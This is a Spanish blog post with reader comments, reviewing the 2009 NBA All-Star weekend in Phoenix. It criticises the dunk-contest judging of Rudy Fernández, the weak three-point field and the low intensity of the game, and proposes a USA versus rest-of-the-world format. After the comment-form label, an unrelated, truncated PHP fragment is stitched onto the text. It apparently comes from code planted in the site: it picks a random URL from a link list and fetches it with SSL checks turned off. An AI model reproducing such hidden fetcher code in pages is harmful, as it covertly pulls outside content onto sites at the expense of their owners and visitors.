AllStar 2009. ¿Valió la pena?

16 de February de 2009 por txusma

Arrastro un fenomenal cansancio después de ver en directo los concursos y el partido de las estrellas del AllStar de Phoenix y es que la edad no perdona y lo que hace unos años no me causaba una gran esfuerzo ahora me dejará aplatanado seguramente para el resto de la semana. Pero se dice que “sarna con gusto no pica” así que no puedo quejarme de nada. La única pregunta es: “¿Realmente valió la pena?”.

Rookies vs Sophomores

El primer día del AllStar falté a la cita de manera totalmente consciente. El partido Rookies vs Sopohomores no tiene ningún tipo de aliciente porque acaba convertiéndose en un correcalles en el que cada jugador busca tan solo el lucimiento personal. Nada de tensión, nada de defensa, nada de nada. Posiblemente en sus inicios la idea parecía buena pero ya hace años que la cosa no funciona. Además que, a no ser que la generación de rookies sea portentosa (y está lo es), lo normal es que los sophomores, con un año más de experiencia en la liga se lleven el partido casi de calle a poco que se esfuercen. De hecho los rookies solo han ganado en 2 de las 10 ediciones que se han disputado, la última vez en 2002 (Pau Gasol jugó aquel partido como rookie y también Rebraca! Que cosas). Antes del año 2000 hubo varios experimentos que involucraban tan solo a Rookies lo que obviamente rebajaba mucho el nivel de los jugadores y con él el del supuesto espectáculo. Visitando esta página podréis observar que jugadores llegaron a estar presentes en el evento (¿Quién  narices fue Rodrick Rhodes?).

En diferentes blogs se está comentando que sería interesante cambiar este partido por uno que enfrentara a los rookies y a una selección de jugadores de la D-League. Los partidos de la D-League no son el paradigma del buen baloncesto pero estoy seguro de que estos jugadores, veteranos algunos, trotamundos del baloncesto, no iban a dejar escapar la ocasión de demostrar ante el mundo entero su calidad. Al menos la intensidad subiría enteros. Eso sí, ¿le interesaría a alguien? ¿Quién se levantaría a las 2:00 para ver a Blake Ahearn o Courtney Sims? Yo no.

Los concursos previos

Pero el segundo día sí que me senté frente a la tele con ganas de no perderme ningún detalle de los concursos. La sola presencia de Rudy en los mates fue motivo suficiente para sentarme en el sillón y aún diré más: para sentar en el sillón a mi mujer a la que esto de la NBA le entra por una oreja y le sale por la otra. Antes de los platos fuerte hubo que tragarse el concurso de tiros de las estrellas y el de habilidades. El primero tiene la gracia de ver como se conservan algunas estrellas de otros años y es que  no deja de ser curioso comprobar el tino de los Laimbeer, Majerle, Cooper o Robinson. Tal vez ganaría un poco de interés si todos los equipos tuvieran un mega-crack en sus filas como San Antonio y Duncan. ¿Para qué va Affalo estando Iverson por allí? ¿Y porque Fisher y no Kobe? ¿Barbosa y no Amare? Al final todo se decide con la lotería del tiro desde el centro del campo pero no deja de ser un entremés bastante entretenido. Además si hay un pique como el de Phoenix-San Antonio la cosa gana bastante.

El siguiente tentepié fue el concurso de habilidades, una buena idea que cada año motiva menos y es que tuvimos que esperar a la final para ver correr a algún participante. Y aún así el que corrió (Devin Harris) no ganó debido a su mal tiro desde la cabeza de la bombilla y su ineficacia en los pases. Daba un poco de rabia ver a los jugadores trotar en pos la última canasta sin ningún tipo de interés ni de ganas por arañar unos segundos al reloj. “¿Que me quedo fuera por 0.5? No pasa nada. Total, ¿a quién le importa esto?”. Al final, victoria para un Derrick Rose que daba la impresión de estar allí por obligación y que no se dignó a apretar el acelerador hasta el último segundo en el que tuvo la decencia de acabar su participación con un buen mate de espaldas. Anteriormente, su buen hacer en los pases y los tiros le había dado la ventaja suficiente para poder ir de rodillas en la última zona de slalom si hubiese querido. Gran papel de Tony Parker, por cierto.

El concurso de triples

Después de 1 hora y media ¿perdida? pasamos al primer plato fuerte del día. Un repaso a los participantes ya nos pone la mosca detrás de la oreja porque, aparte de Jason Kapono, no encontramos ningún especialista nato en el arte del tiro de 3. Al final asistimos a uno de los concursos más pobres de los últimos años con el de Toronto decepcionando amargamente (aunque seguro que más decepcionado debía sentirse él). Ningún jugador pasó de los 20 puntos y eso, después de ver por ejemplo el concurso de 2007 (con Mike Miller fuera de la final a pesar de anotar 23 puntos), deja muy mal sabor de boca. ¿Realmente no hay mejores jugadores para este concurso que Rashard Lewis o Danny Granger? Si queremos un concurso de calidad no debería faltar para empezar el que creo que es junto con Kapono el mejor triplista de la liga: Peja Stojakovic. Y con él, podrían haber acudido también Kevin Martin, Raja Bell o Eddie House, por ejemplo. Y tampoco entiendo porque tan solo ha de haber 6 jugadores cuando antes eran 8 y se utilizaba aquel fabuloso recurso de la pantalla partida. ¿Qué hay más bonito en este concurso que ver a Kapono a un lado y Peja en el otro anotando triple tras triple? Qué vuelvan la pantalla partida y las 3 rondas de tiros!!

El concurso de mates

Por fin llegamos a lo que todo el mundo esperaba esa noche: los españoles querían ver a Rudy y los americanos a Howard y Robinson. El resto casi que les sobraba. En el concurso de mates hace tiempo que ha dejado de considerarse cualquier argumento objetivo para calificar los mates de los jugadores y eso mismo supone, en mi opinión, una gran hándicap que a los americanos parece no importarles lo más mínimo. Allí lo que interesa es el espectáculo y si lo que da espectáculo es un tio vestido de supermán y otro vestido de kriptonita pues eso que vamos a valorar… Y si los podemos juntar en la final, mejor que mejor.

Rudy tuvo que luchar contra la típica ignorancia americana que se encabezona en negar todo lo que pasa más allá de sus fronteras y contra un jurado que desde el primer momento sabía que es lo que quería ver en la final (seguramente lo que les dijeron los organizadores del evento que querían ellos, claro). Yo puedo perdonar que no conozcan quien fue Fernando Martín (de hecho su paso por la NBA fue casi anecdótico) pero no que los comentaristas de la TNT, en lugar de admitir su ignorancia, se pongan a hacer bromas sobre Rudy y Ricky Martin. Lo que intuímos en el primer momento (que Rudy iba a ser infravalorado) pudimos comprobarlo perfectamente con su segundo mate, para mí, el más difícil de todo el concurso, que según los “expertos” sólo fue merecedor de un 42, un punto por debajo del segundo cutre-mate de JR Smith y sólo un punto por encima del mate de Nate Robinson en el que casi le parte la espalda a su compañero Wilson Chandler. Rudy se ha de quedar con los abucheos con los que el público del pabellón coreaba sus puntuaciones en profundo desacuerdo con el jurado.

Sobre el concurso en sí, Nate no debería haber pasado a la final pero una vez en ella fue justo vencedor. Su salto sobre Dwight Howard pasará a la historia como uno de los más impresionantes mates de todos los tiempos porque (aunque a los más puristas no les gusta recordarlo) el base de NY mide 1.70m. ¿Se le debe tener en cuenta a la hora de valorar? Pues supongo que sí, igual que se le tuvo en cuenta a Spud Webb en 1986. No me gustó todo el espectaculo que se trajeron Howard y Robinson y que desviaron totalmente la atención de los que deberían ser los auténticos protagonistas del concurso: los mates con su técnica, su plasticidad, su potencia y su originalidad. No equivoquemos la originalidad del mate con el show previo. Creo que todos, incluso los americanos, somos capaces de diferenciar una cosa de la otra.

¿Es posible mejorar el concurso? Parece complicado ya que con solo 4 participantes y 2 mates por participante en la ronda previa la cosa se va a la hora pero creo que alguna cosilla se podría hacer. ¿Porqué no copiar un poco el formato de los triples? Dejemos 2 minutos a cada jugador y que haga el número de mates que quiera. De esta manera se podría valorar el arsenal de mates y la seguridad (si gastas 1 minuto en hacer un mate, pocos más harás) además de las cuestiones objetivas intrínsecas. De pasada ahorramos tiempo porque evitamos que la gente en primera ronda se disfrace, se vaya a buscar canastas, se meta en cabinas, se pinte de verde, prenda fuego a los balones, etc, etc… Al final de los 2 minutos, valoración global de la actuación y a por el siguiente. Creo que podrían llamar a mínimo 6 jugadores (en 20 minutos tenemos la primera ronda acabada) y que pasaran 3 a la final y en ella, que ya se hagan los homenajes y excentricidades que se quiera. Ah! Y que el público vote desde la primera ronda. ¿Funcionaría?

AllStar Game

Y por fin el último día llegamos a lo teóricamente más interesante. Y digo teóricamente porque es complicado encontrar algun tipo de interés más allá de adivinar que jugador será el MVP del partido. Si tenemos suerte podemos encontrar algo de intensidad en el último cuarto si el partido está igualado y hay un par de jugadores de ambos equipos jugándose el MVP. Si no es así, olvidémoslo. Y ayer no fue el caso.

Supongo que debe ser complicado para un jugador encontrar ese punto medio entre el espectáculo total y la concentración absoluta. Quieras que no tampoco podemos pedir que jueguen como si un partido de Playoffs se tratara pero por favor, que no se aparten para dejar el pasillo libre al matador de turno (me encantó cuando Howard pensó que Yao se apartaría y el chino no lo hizo). Y aún más rabia me dieron aún los últimos 2 minutos de partidos con Lebron picado consigo mismo intentando hacer un mate mientras compañeros y rivales le dejaban el pasillo y le jaleaban o Paul fallando un mate completamente solo (perdonado por el Alley-Hoop de minutos antes)… Suerte que jugadores como Duncan, Roy, Gasol o Billups aportaron la seriedad mínima necesaria en cualquier partido.

¿Quieren una buena idea para poder disfrutar de un partido realmente intenso y competido no exento en ningún momento de espectáculo? ¿Qué os parece un USA-Resto del mundo? La tradición lo impedirá pero imaginaros a Paul, Kobe, Lebron, Garnett, Howard, Wade, Billups, etc… frente a Nash, Ginobili, Stojakovic, Gasol, Nowitzki, Yao, Calderón, etc… Se me cae la baba sólo de pensarlo.

Después de releer el artículo parece que tan solo me quejo pero prometo que yo he disfrutado bastante del espectáculo. Creo que podría mejorar en algunos aspectos y que si no fueran tan suyos (igual que nosotros somos tan nuestros) el AllStar podría ser mucho más grande de lo que ya es.

Comenta

13 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Ahí le has dado Txus, un USA-Resto del mundo es lo que llevamos pidiendo desde hace años, en vez de las patochadas que vienen siendo los All-Star, joder es que cada vez son mas globbertrotteros… es como el bombero torero en version baloncesto…

      Citar

  2. TheDeerHunter dice:
    #2

    Es evidente que la forma de entender el espectáculo no es la misma aquí, que en USA o que en Italia, por poner un ejemplo. Se nos hace difícil interesarnos en el simple show cuando hablamos de un evento deportivo. Lo que más nos atrae es la competición más pura posible. Sin embargo, teniendo en cuenta determinados eventos de máximo interés a nivel Europeo me pregunto si de vez en cuando no nos conviene a nosotros relajar esa competitividad mal entendida que al final lo que provoca es que resulten verdaderos toñazos en un excesivo número de casos. ¿acaso a los más puristas no le pudo resultar divertida y espectacular la actuación de Shaq anoche? ¿o espectacular los mates a tablero de T-Mac y Vince?? Al fin y al cabo éste es un momento único para poder experimentar ese tipo de jugadas. No hay otro. Eso, creo, es precisamente el entender bien lo que es no jugarse nada.

    Pero claro, por ese camino tenemos un reverso tenebroso… la mayoría de jugadores no tiene el sentido del espectáculo que puede tener “El perro gordo”. A muchos les cuesta encontrar su sitio en tal contexto y lo que finalmente nos transmiten es desidia en todas sus vertientes… sobre todo en los momentos en los que ya está todo decidido y sobre todos los jugadores más jóvenes.

    Si a la mezcla le añades jugadores obligados, endiosados, poco preparados para el tema junto a sistemas de competición y de votación que no terminan de tener sentido y juegos que tienden peligrosamente a la monotonía y al aburrimiento tienes todo lo malo que hemos sufrido este fin de semana. Alíñalo además con homenajes super-americanos que ya se pasan tres pueblos de pastosos y actos institucionales. Te puedes morir del asco. Eso sí… todo esto era optativo.

    Pero el concepto original es bueno. La idea de juntar en la misma pista a los mejores jugadores del mundo y que nos muestren lo mejor que saben hacer es fantástica y es eso precisamente lo que hemos anhelado ver con mayor o menor éxito durante los años. Eso es lo que se debe buscar y la NBA tendrá que implementar importantes cambios para lograrlo.

      Citar

  3. TheDeerHunter dice:
    #3

    Perdonadme discrepar con algunos puntos.
    No me parece buena idea el USA contra el resto del mundo… primero porque por la naturaleza del evento es muy posible que en cuanto a competitividad apenas lograras nada. Nadie va a arriesgar una lesión o lesionar a alguien defendiendo alguna barrabasada de las que vemos habitualmente en el all-star sin jugarse más que la honrilla por muy USA contra resto del mundo que sea. Por ese lado eso va con el evento y es comprensible y necesario.
    Después, con toda la que está cayendo sólo faltaba incidir todavía más en “el aspecto diferencial” cuando a algunos jugadores americanos lo que les hace falta es precísamente todo lo contrario.
    Por último, para el equipo resto del mundo entiendo que sería una auténtica encerrona… y lo único que se conseguiría es que habitualmente hubiera un 2-8 como en el rookies-shophormores.

    Además, el tema de las votaciones es precísamente lo que hace que se presenten equipos tan mal hechos como el del último fin de semana. Lo normal si sólo cuentas con Rashaad Lewis como pívot reserva y tienes que jugar con él por narices (no va a jugar Howard todo el partido de las estrellas) es que salga Shaq y te pegue una paliza de muy señor mío.
    No me gusta la idea que el concurso de mates se vuelva un concurso de popularidad… más todavía.

    De todas formas hablamos de que este all star week end ha sido bastante malo… pero en los últimos 5 años, por poner un ejemplo, ha habido grandísimos all-stars. (y en los últimos 10 ni te cuento… o los últimos 20) Tampoco podemos esperar que sean buenos todos al 100%.

      Citar

  4. Txusma dice:
    #4

    Pues por lo q yo vi en el concurso de mates el público fue mucho más inteligente que el jurado. Hace ya tiempo que perdi la fe en el jurado que no deja de ser formado casi por los mas holligans del pabellón y q en cuanto le enfocan las camaras pierden el culo por poner la mayor cara de asombrados posibles. Si el publico hubiera mandado, Rudy hubiera jugado la final seguramente frente a Howard y seguramente (nunca lo sabremos) alli habria palmado. No es un resultado mas justo q el que pudimos contemplar?

      Citar

  5. MagicJohnson32 dice:
    #5

    Yo me conformaría con que los jugadores pusiesen un puntito más de intensidad y seriedad. Los hay que sí, que cumplen, pero no son muchos. Creo que la clave es que se ha ido perdiendo la clásica rivalidad interconferencias. Aunque en parte puede ser culpa de Stern y la NBA por potenciar demasiado la vertiente ‘show’ del fin de semana.

      Citar

  6. TheDeerHunter dice:
    #6

    Tan justo como haber visto al otro chino de titular como alero en el este.

      Citar

  7. TheDeerHunter dice:
    #7

    Muy interesantes reflexiones… a colación:
    http://blogs.acb.com/blog/elpuntog/post/divagaciones-olestarianas

      Citar

  8. Elio dice:
    #8

    El USA-Resto del mundo sería algo como para mearse en los pantalones. Muy buena idea que dudo que la NBA quiera llevar a cabo.

    Y sí, yo me vi los tres días íntegros en directo y madre mía, podían haberlo hecho mucho mejor, aunque hubiese sido sólo por mi 😀

      Citar

  9. Txusma dice:
    #9

    No hay solución perfecta pero no me querras hacer creer que lo del jurado es minimamente serio.

      Citar

  10. TheDeerHunter dice:
    #10

    No lo es pero entiendo que sí lo podría llegar a ser.
    Sin embargo lo de la votación popular es un camino que no sólo no deseo recorrer sino que creo que me gustaría eliminarlas de cualquier poder de decisión para este evente.

      Citar

  11. Viva_Dirk dice:
    #11

    La idea del USA VS Resto del Mundo me parece buena, como es buena la idea del Este VS Oeste, la cuestión es lo que los jugadores y la liga le den de importancia al evento.

    En el plus han puesto All-Star de otros años y han sido muy buenos, evidentemente habia momentos para el lucimiento, pero también se veian acciones de autentica competición, especialmente en el juego interior.

      Citar

  12. Jabho dice:
    #12

    A mi el All Star me interesa muy poco. Creo que como dice Magic se ha perdido cierta rivalidad y ha bajado la competitividad del partido. El de rookies vs sophmore es un bodria y los concursos no estarían mal con mas interés

    Se podrían jugar la ventaja campo en la final de la liga, que como el entrenador de cada equipo es uno de los 2 primeros clasificados de su conferencia y hay muchos jgadores con posibilidad de llegar a la final igual le ponían un poco de interés al asunto….

      Citar

  13. Txusma dice:
    #13

    Por favor no os perdais la ronda final del concurso de mates de la D-League. Sin tanta parafernalia, sin tanto superman y kriptonita pero no exenta de calidad. Ademas los videos estan tb en camara super lenta para que se pueda apreciar perfectamente la categoria de los saltos:

    http://www.draftexpress.com/article/2009-NBA-D-League-Slam-Dunk-Contest-3112/

    En la NBA se deberian tb poder ver asi antes de ser valorados por nadie.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>